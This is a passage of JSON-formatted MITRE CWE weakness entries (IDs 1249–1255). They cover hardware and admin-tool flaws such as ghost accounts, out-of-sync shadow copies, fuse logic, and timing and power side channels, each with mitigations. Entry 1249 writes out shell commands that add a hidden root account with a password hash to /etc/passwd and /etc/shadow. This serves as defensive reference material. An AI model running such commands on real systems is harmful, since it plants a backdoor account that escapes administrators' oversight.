defects. When these defects manifest as faults in security-critical, hardware modules, it results in compromise of security guarantees. Thus, operating the device within the specification is important."}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The network-on-chip implements a firewall for access control to peripherals from all IP cores capable of mastering transactions.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":"A manufacturing defect in this logic manifests itself as a logical fault, which always sets the output of the filter to \\"allow\\" access."},"Body_Text":"Post-manufacture testing must be performed to ensure that hardware logic implementing security functionalities is defect-free."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"624"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1067"}},{"attr":{"@_External_Reference_ID":"REF-1068"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Modes_of_Introduction, Related_Attack_Patterns"}}},"1249":{"attr":{"@_ID":"1249","@_Name":"Application-Level Admin Tool with Inconsistent View of Underlying Operating System","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product provides an application for administrators to manage parts of the underlying operating system, but the application does not accurately identify all of the relevant entities or resources that exist in the OS; that is, the application\'s model of the OS\'s state is inconsistent with the OS\'s actual state.","Extended_Description":{"xhtml:p":["Many products provide web-based applications or other software for managing the underlying operating system. This is common with cloud, network access devices, home networking, and other systems. When the management tool does not accurately represent what is in the OS - such as user accounts - then the administrator might not see suspicious activities that would be noticed otherwise.","For example, numerous systems utilize a web\\n\\t\\t\\t\\tfront-end for administrative control. They also offer\\n\\t\\t\\t\\tthe ability to add, alter, and drop users with various\\n\\t\\t\\t\\tprivileges as it relates to the functionality of the\\n\\t\\t\\t\\tsystem. A potential architectural weakness may exist\\n\\t\\t\\t\\twhere the user information reflected in the web\\n\\t\\t\\t\\tinterface does not mirror the users in the underlying\\n\\t\\t\\t\\toperating system. Many web UI or REST APIs use the\\n\\t\\t\\t\\tunderlying operating system for authentication; the\\n\\t\\t\\t\\tsystem\'s logic may also track an additional set of\\n\\t\\t\\t\\tuser capabilities within configuration files\\n\\t\\t\\t\\tand datasets for authorization capabilities. When\\n\\t\\t\\t\\tthere is a discrepancy between the user information in\\n\\t\\t\\t\\tthe UI or REST API\'s interface system and the\\n\\t\\t\\t\\tunderlying operating system\'s user listing, this may\\n\\t\\t\\t\\tintroduce a weakness into the system. For example, if an\\n\\t\\t\\t\\tattacker compromises the OS and adds a new user\\n\\t\\t\\t\\taccount - a \\"ghost\\" account - then the attacker could escape detection if\\n\\t\\t\\t\\tthe management tool does not list the newly-added\\n\\t\\t\\t\\taccount.","This discrepancy could be exploited in several ways:","Many of these attacker scenarios can be\\n\\t\\t\\t\\trealized by leveraging separate vulnerabilities\\n\\t\\t\\t\\trelated to XSS, command injection, authentication\\n\\t\\t\\t\\tbypass, or logic flaws on the various systems."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["A rogue admin could insert a new account into a system that will\\npersist if they are terminated or wish to take action on a system that\\ncannot be directly associated with them.","An attacker can leverage a separate command injection attack available through the web interface to insert a ghost account with shell privileges such as ssh.","An attacker can leverage existing web interface APIs, manipulated in such a way that a new user is inserted into the operating system, and the user web account is either partially created or not at all.","An attacker could create an admin\\n\\t\\t\\t\\t\\t account which is viewable by an administrator,\\n\\t\\t\\t\\t\\t use this account to create the ghost account,\\n\\t\\t\\t\\t\\t delete logs and delete the first created admin\\n\\t\\t\\t\\t\\t account."]}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1250","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Web Based","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":{"Term":"Ghost in the Shell"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The design might assume that the underlying OS does not change."},{"Phase":"Implementation","Note":"Assumptions about the underlying OS might be hard-coded into the application or otherwise in external data stores in a way that is not updated when the OS\'s state changes."}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Varies by Context"},{"Scope":"Accountability","Impact":"Hide Activities"},{"Scope":"Other","Impact":"Unexpected State"}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"Ensure that the admin tool refreshes its model of the underlying OS on a regular basis, and note any inconsistencies with configuration files or other data sources that are expected to have the same data."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Suppose that an attacker successfully gains root privileges on a Linux system and adds a new \'user2\' account:","Example_Code":{"attr":{"@_Nature":"attack","@_Language":"Other"},"xhtml:div":["echo \\"user2:x:0:0::/root:/\\" >> /etc/passwd;","echo\\n\\t\\t\\t\\t\\t \\"user2:\\\\$6\\\\$IdvyrM6VJnG8Su5U\\\\$1gmW3Nm.IO4vxTQDQ1C8urm72JCadOHZQwqiH/nRtL8dPY80xS4Ovsv5bPCMWnXKKWwmsocSWXupUf17LB3oS.:17256:0:99999:7:::\\" >> /etc/shadow;"]},"Body_Text":["This new user2 account would not be noticed on the web interface, if the interface does not refresh its data of available users.","It could be argued that for this specific example, an attacker with root privileges would be likely to compromise the admin tool or otherwise feed it with false data. However, this example shows how the discrepancy in critical data can help attackers to escape detection."]}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1070"}}},"Content_History":{"Submission":{"Submission_Name":"Tony Martin","Submission_Date":"2019-06-06"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Demonstrative_Examples"}}},"1250":{"attr":{"@_ID":"1250","@_Name":"Improper Preservation of Consistency Between Independent Representations of Shared State","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product has or supports multiple distributed components or sub-systems that are each required to keep their own local copy of shared data - such as state or cache - but the product does not ensure that all local copies remain consistent with each other.","Extended_Description":{"xhtml:p":["In highly distributed environments, or on systems with distinct physical components that operate independently, there is often a need for each component to store and update its own local copy of key data such as state or cache, so that all components have the same \\"view\\" of the overall system and operate in a coordinated fashion. For example, users of a social media service or a massively multiplayer online game might be using their own personal computers while also interacting with different physical hosts in a globally distributed service, but all participants must be able to have the same \\"view\\" of the world. Alternately, a processor\'s Memory Management Unit (MMU) might have \\"shadow\\" MMUs to distribute its workload, and all shadow MMUs are expected to have the same accessible ranges of memory.","In such environments, it becomes critical for\\n\\t\\tthe product to ensure that this \\"shared state\\" is\\n\\t\\tconsistently modified across all distributed systems.\\n\\t\\tIf state is not consistently maintained across all\\n\\t\\tsystems, then critical transactions might take place\\n\\t\\tout of order, or some users might not get the same\\n\\t\\tdata as other users. When this inconsistency affects\\n\\t\\tcorrectness of operations, it can introduce\\n\\t\\tvulnerabilities in mechanisms that depend on\\n\\t\\tconsistent state."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Class":"Cloud Computing","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Security IP","@_Prevalence":"Undetermined"}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-132"},"Intro_Text":"Suppose a processor\'s Memory Management Unit (MMU) has 5 other shadow MMUs to distribute its workload for its various cores. Each MMU has the start address and end address of \\"accessible\\" memory. Any time this accessible range changes (as per the processor\'s boot status), the main MMU sends an update message to all the shadow MMUs.","Body_Text":"Suppose the interconnect fabric does not prioritize such \\"update\\" packets over other general traffic packets. This introduces a race condition. If an attacker can flood the target with enough messages so that some of those attack packets reach the target before the new access ranges gets updated, then the attacker can leverage this scenario."}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1069"}}},"Notes":{"Note":{"#text":"Issues related to state and cache - creation,\\n\\t\\tpreservation, and update - are a significant gap in\\n\\t\\tCWE that is expected to be addressed in future\\n\\t\\tversions. It likely has relationships to concurrency\\n\\t\\tand synchronization, incorrect behavior order, and\\n\\t\\tother areas that already have some coverage in CWE,\\n\\t\\talthough the focus has typically been on independent\\n\\t\\tprocesses on the same operating system - not on\\n\\t\\tindependent systems that are all a part of a larger\\n\\t\\tsystem-of-systems.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"CWE Content Team","Submission_Date":"2020-02-13"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Applicable_Platforms"}}},"1251":{"attr":{"@_ID":"1251","@_Name":"Mirrored Regions with Different Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product\'s architecture mirrors regions without ensuring that their contents always stay in sync.","Extended_Description":{"xhtml:p":["Having mirrored regions with different values might result in the exposure of sensitive information or possibly system compromise.","In the interest of increased performance, one might need to duplicate a resource. A cache memory is a common example of this concept, which keeps a \\"local\\" copy of a data element in the high speed cache memory. Unfortunately, this speed improvement comes with a downside, since the product needs to ensure that the local copy always mirrors the original copy truthfully. If they get out of sync, the computational result is no longer true.","During hardware design, memory is not the only item which gets mirrored. There are many other entities that get mirrored, as well: registers, memory regions, and, in some cases, even whole computational units. For example, within a multi-core processor, if all memory accesses for each and every core goes through a single Memory-Management Unit (MMU) then the MMU will become a performance bottleneck. In such cases, duplicating local MMUs that will serve only a subset of the cores rather than all of them may resolve the performance issue. These local copies are also called \\"shadow copies\\" or \\"mirrored copies.\\"","If the original resource never changed, local duplicate copies getting out of sync would never be an issue. However, the values of the original copy will sometimes change. When the original copy changes, the mirrored copies must also change, and change fast.","This situation of shadow-copy-possibly-out-of-sync-with-original-copy might occur as a result of multiple scenarios, including the following:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["After the values in the original copy change, due to some reason the original copy does not send the \\"update\\" request to its shadow copies.","After the values in the original copy change, the original copy dutifully sends the \\"update\\" request to its shadow copies, but due to some reason the shadow copy does not \\"execute\\" this update request.","After the values in the original copy change, the original copy sends the \\"update\\" request to its shadow copies, and the shadow copy executes this update request faithfully. However, during the small time period when the original copy has \\"new\\" values and the shadow copy is still holding the \\"old\\" values, an attacker can exploit the old values. Then it becomes a race condition between the attacker and the update process of who can reach the target, shadow copy first, and, if the attacker reaches first, the attacker wins.","The attacker might send a \\"spoofed\\" update request to the target shadow copy, pretending that this update request is coming from the original copy. This spoofed request might cause the targeted shadow copy to update its values to some attacker-friendly values, while the original copies remain unchanged by the attacker.","Suppose a situation where the original copy has a system of reverting back to its original value if it does not hear back from all the shadow copies that such copies have successfully completed the update request. In such a case, an attack might occur as follows: (1) the original copy might send an update request; (2) the shadow copy updates it; (3) the shadow copy sends back the successful completion message; (4) through a separate issue, the attacker is able to intercept the shadow copy\'s completion message. In this case, the original copy thinks that the update did not succeed, hence it reverts to its original value. Now there is a situation where the original copy has the \\"old\\" value, and the shadow copy has the \\"new\\" value."]}}}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1250","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"System on Chip","@_Prevalence":"Undetermined"}}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"Whenever there are multiple, physically different copies of the same value that might change and the process to update them is not instantaneous and atomic, it is impossible to assert that the original and shadow copies will always be in sync - there will always be a time period when they are out of sync. To mitigate the consequential risk, the recommendations essentially are:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Make this out-of-sync time period as small as possible, and","Make the update process as robust as possible."]}}}},"Effectiveness":"Moderate"}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-132"},"Intro_Text":"Suppose a processor\'s Memory Management Unit (MMU) has 5 other shadow MMUs to distribute its workload for its various cores. Each MMU has the start address and end address of \\"accessible\\" memory. Any time this accessible range changes (as per the processor\'s boot status), the main MMU sends an update message to all the shadow MMUs.","Body_Text":"Suppose the interconnect fabric does not prioritize such \\"update\\" packets over other general traffic packets. This introduces a race condition. If an attacker can flood the target with enough messages so that some of those attack packets reach the target before the new access ranges gets updated, then the attacker can leverage this scenario."}},"Notes":{"Note":{"#text":"Issues related to state and cache - creation, preservation, and update - are a significant gap in CWE that is expected to be addressed in future versions. It has relationships to concurrency and synchronization, incorrect behavior order, and other areas that already have some coverage in CWE, although the focus has typically been on independent processes on the same operating system - not on independent systems that are all a part of a larger system-of-systems.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-10"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}]}},"1252":{"attr":{"@_ID":"1252","@_Name":"CPU Hardware Not Configured to Support Exclusivity of Write and Execute Operations","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The CPU is not configured to provide hardware support for exclusivity of write and execute operations on memory. This allows an attacker to execute data from all of memory.","Extended_Description":{"xhtml:p":"CPUs provide a special bit that supports exclusivity of write and execute operations. This bit is used to segregate areas of memory to either mark them as code (instructions, which can be executed) or data (which should not be executed). In this way, if a user can write to a region of memory, the user cannot execute from that region and vice versa. This exclusivity provided by special hardware bit is leveraged by the operating system to protect executable space. While this bit is available in most modern processors by default, in some CPUs the exclusivity is implemented via a memory-protection unit (MPU) and memory-management unit (MMU) in which memory regions can be carved out with exact read, write, and execute permissions. However, if the CPU does not have an MMU/MPU, then there is no write exclusivity. Without configuring exclusivity of operations via segregated areas of memory, an attacker may be able to inject malicious code onto memory and later execute it."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Microcontroller IP","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Processor IP","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":{"xhtml:p":"Implement a dedicated bit that can be leveraged by the Operating System to mark data areas as non-executable. If such a bit is not available in the CPU, implement MMU/MPU (memory management unit / memory protection unit)."}},{"Phase":"Integration","Description":{"xhtml:p":"If MMU/MPU are not available, then the firewalls need to be implemented in the SoC interconnect to mimic the write-exclusivity operation."}}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"MCS51 Microcontroller (based on 8051) does not have a special bit to support write exclusivity. It also does not have an MMU/MPU support. The Cortex-M CPU has an optional MPU that supports up to 8 regions.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":"The optional MPU is not configured."},"Body_Text":"If the MPU is not configured, then an attacker will be able to inject malicious data into memory and execute it."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"1"}},{"attr":{"@_CAPEC_ID":"180"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-1076"}},{"attr":{"@_External_Reference_ID":"REF-1077"}},{"attr":{"@_External_Reference_ID":"REF-1078"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-13"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}}},"1253":{"attr":{"@_ID":"1253","@_Name":"Incorrect Selection of Fuse Values","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The logic level used to set a system to a secure state relies on a fuse being unblown. An attacker can set the system to an insecure state merely by blowing the fuse.","Extended_Description":{"xhtml:p":"Fuses are often used to store secret data, including security configuration data. When not blown, a fuse is considered to store a logic 0, and, when blown, it indicates a logic 1. Fuses are generally considered to be one-directional, i.e., once blown to logic 1, it cannot be reset to logic 0. However, if the logic used to determine system-security state (by leveraging the values sensed from the fuses) uses negative logic, an attacker might blow the fuse and drive the system to an insecure state."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Access Control","Authorization"],"Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"]},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart"},{"Scope":"Confidentiality","Impact":"Read Memory"},{"Scope":"Integrity","Impact":["Modify Memory","Execute Unauthorized Code or Commands"]}]},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Logic should be designed in a way that blown fuses do not put the product into an insecure state that can be leveraged by an attacker."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["A chip implements a secure boot and uses the sensed value of a fuse \\n \\"do_secure_boot\\" to determine whether to perform a secure boot or not. If this fuse \\n value is \\"0\\", the system performs secure boot. Otherwise, it does not perform secure \\n boot.","An attacker blows the \\"do_secure_boot\\" fuse to \\"1\\". After reset, the attacker loads a custom \\n bootloader, and, since the fuse value is now \\"1\\", the system does not perform secure boot, \\n and the attacker can execute their custom firmware image.","Since by default, a fuse-configuration value is a \\"0\\", an attacker can blow it to a \\"1\\" with \\n inexpensive hardware.","If the logic is reversed, an attacker cannot easily reset the fuse. Note that, with \\n specialized and expensive equipment, an attacker with full physical access might be able to \\"unblow\\" the fuse \\n value to a \\"0\\"."]}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"74"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1080"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2019-10-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1254":{"attr":{"@_ID":"1254","@_Name":"Incorrect Comparison Logic Granularity","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product\'s comparison logic is performed over a series of steps rather than across the entire string in one operation. If there is a comparison logic failure on one of these steps, the operation may be vulnerable to a timing attack that can result in the interception of the process for nefarious purposes.","Extended_Description":{"xhtml:p":"Comparison logic is used to compare a variety of objects including passwords, Message \\n Authentication Codes (MACs), and responses to verification challenges. When comparison logic is \\n implemented at a finer granularity (e.g., byte-by-byte comparison) and breaks in the case of a \\n comparison failure, an attacker can exploit this implementation to identify when exactly \\n the failure occurred. With multiple attempts, the attacker may be able to guesses the correct \\n password/response to challenge and elevate their privileges."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"208","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"697","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Authorization"],"Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":{"xhtml:p":"The hardware designer should ensure that comparison logic is implemented so as to compare in one operation instead in smaller chunks."}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider an example hardware module that checks a user-provided password to grant access to a user. The user-provided password is compared against a golden value in a byte-by-byte manner.","Example_Code":[{"#text":"always_comb @ (posedge clk)beginassign check_pass[3:0] = 4\u2019b0;for (i = 0; i < 4; i++) beginif (entered_pass[(i*8 \u2013 1) : i] eq golden_pass([i*8 -1) : i])assign check_pass[i] = 1;continue;elseassign check_pass[i] = 0;break;endassign grant_access = (check_pass == 4\u2019b1111) ? 1\u2019b1: 1\u2019b0;end","attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":"","xhtml:br":["","","","","","","","","","","",""]},{"#text":"Either the comparison of the entire string should be done all at once or the attacker is not given an indication whether pass or fail happened by allowing the comparison to run through all bits before the grant_access signal is set.always_comb @ (posedge clk)beginassign check_pass[3:0] = 4\u2019b0;for (i = 0; i < 4; i++) beginif (entered_pass[(i*8 \u2013 1) : i] eq golden_pass([i*8 -1) : i])assign check_pass[i] = 1;continue;elseassign check_pass[i] = 0;continue;endassign grant_access = (check_pass == 4\u2019b1111) ? 1\u2019b1: 1\u2019b0;end","attr":{"@_Nature":"informative"},"xhtml:br":["","","","","","","","","","","","","","","",""]}],"Body_Text":"Since the code breaks on an incorrect entry of password, an attacker can guess the correct password for that byte-check iteration with few repeat attempts."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2014-0984","Description":"The passwordCheck function in SAP Router 721 patch 117, 720 patch 411, 710 patch 029, and earlier terminates validation of a Route Permission Table entry password upon encountering the first incorrect character, which allows remote attackers to obtain passwords via a brute-force attack that relies on timing differences in responses to incorrect password guesses, aka a timing side-channel attack.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0984"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"26"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1079"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1255":{"attr":{"@_ID":"1255","@_Name":"Comparison Logic is Vulnerable to Power Side-Channel Attacks","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"A device\'s real time power consumption may be monitored during security token evaluation and the information gleaned may be used to determine the value of the reference token.","Extended_Description":{"xhtml:p":"The power consumed by a device may be instrumented and monitored in real time. If the algorithm for evaluating security tokens is not sufficiently robust, the power consumption may vary by token entry comparison against the reference value. Further, if retries are unlimited, the power difference between a \\"good\\" entry and a \\"bad\\" entry may be observed and used to determine whether each entry itself is correct thereby allowing unauthorized parties to calculate the reference value."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1300","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"1259","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"The design of the algorithm itself may intrinsically allow the power side channel attack to be effective"},{"Phase":"Implementation","Note":"This weakness may be introduced during implementation despite a robust design that otherwise prevents exploitation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":["Modify Memory","Read Memory","Read Files or Directories","Modify Files or Directories","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Read Application Data","Modify Application Data","Hide Activities"],"Note":"As compromising a security token may result in complete system control, the impacts are relatively universal"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"The design phase must consider each check of a security token against a standard and the amount of power consumed during the check of a good token versus a bad token. The alternative is an all at once check where a retry counter is incremented PRIOR to the check."},{"Phase":"Architecture and Design","Description":"Another potential mitigation is to parallelize shifting of secret data (see example 2 below). Note that the wider the bus the more effective the result."},{"Phase":"Architecture and Design","Description":"An additional potential mitigation is to add random data to each crypto operation then subtract it out afterwards. This is highly effective but costly in performance, area, and power consumption. It also requires a random number generator."},{"Phase":"Implementation","Description":"If the architecture is unable to prevent the attack, using filtering components may reduce the ability to implement an attack, however, consideration must be given to the physical removal of the filter elements."},{"Phase":"Integration","Description":"During integration, avoid use of a single secret for an extended period (e.g. frequent key updates). This limits the amount of data compromised but at the cost of complexity of use."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"Consider an example hardware module that checks a user-provided password (or PIN) to grant access to a user. The user-provided password is compared against a stored value byte-by-byte.","Example_Code":[{"#text":"static nonvolatile password_tries = NUM_RETRIES;dowhile (password_tries == 0) ; // Hang here if no more password triespassword_ok = 0;for (i = 0; i < NUM_PW_DIGITS; i++)if (GetPasswordByte() == stored_password([i])password_ok |= 1; // Power consumption is different hereelsepassword_ok |= 0; // than from hereendif (password_ok > 0)password_tries = NUM_RETRIES;break_to_Ok_to_proceedpassword_tries--;while (true)// Password OK","attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:br":["","","","","","","","","","","","","","","",""]},{"#text":"Among various options for mitigating the string comparison is obscuring the power comsumption by having opposing bit flips during bit operations. Note that in this example, the initial change of the bit values could still provide power indication depending upon the hardware itself. This possibility needs to be measured for verification.static nonvolatile password_tries = NUM_RETRIES;dowhile (password_tries == 0) ; // Hang here if no more password triespassword_tries--; // Put retry code here to catch partial retriespassword_ok = 0;for (i = 0; i < NUM_PW_DIGITS; i++)if (GetPasswordByte() == stored_password([i])password_ok |= 0x10; // Power consumption hereelsepassword_ok |= 0x01; // is now the same hereendif ((password_ok & 1) == 0)password_tries = NUM_RETRIES;break_to_Ok_to_proceedwhile (true)// Password OK","attr":{"@_Nature":"good"},"xhtml:br":["","","","","","","","","","","","","","","","","",""]},{"#text":"An alternative to the previous example is simply comparing the whole password simultaneously.static nonvolatile password_tries = NUM_RETRIES;dowhile (password_tries == 0) ; // Hang here if no more password triespassword_tries--; // Put retry code here to catch 